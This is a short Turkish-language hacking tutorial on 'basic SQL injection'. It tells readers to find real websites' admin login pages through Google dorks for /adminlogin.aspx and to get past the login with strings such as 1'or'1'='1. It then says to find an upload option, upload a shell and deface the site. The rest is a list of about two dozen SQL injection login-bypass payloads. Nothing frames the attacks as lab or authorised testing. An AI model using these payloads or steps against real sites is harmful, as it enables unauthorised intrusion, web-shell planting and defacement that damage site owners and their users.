TEMEL SQL ENJEKSİYONU
Bilgisayar korsanlarının web sitelerini hacklediğini ve tahrif ettiğini, kendi öğeleriyle düzenlediğini, web sitelerine gönderi yaptığını vb. görmüş olabilirsiniz. Bunu yapmanın birçok yöntemi var, Bu derste size çok basit ve basit bir SQLi (Structured Query Language Injection) methodu göstereceğim. Basit bir google dork ve SQL sorgusu kullanarak admin kullanıcı adı ve şifresini atlayıp panele girmek için web sitelerinin admin panelini nasıl bulacağınızı göstereceğim. Paneldeyken bir yükleme seçeneği bulun ve kabuğu yükleyin, ardından onu tahrif edin.
# Daha fazla başarı oranı elde etmek için kendi dorklarınızı da yapmaya çalışın.
URL'lerinde /adminlogin.aspx bulunan yüzlerce site açılacaktır. Herhangi bir web sitesini seçin, yöneticilerin giriş yaptığı alanı alacaksınız. Ayrıntıları şu şekilde doldurun:
Kullanıcı: 1'or'1'='1
Şifre: 1'or'1'='1
Yukarıda belirtilen giriş bilgilerini kullanın ve bir web sitesinin yönetici paneline gireceksiniz. Bulacağınız tüm web siteleri için çalışmayacak, ancak web sitesinin çoğunda çalışacaktır.
Diğer Enjeksiyon Sorguları :
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)
Son düzenleme:


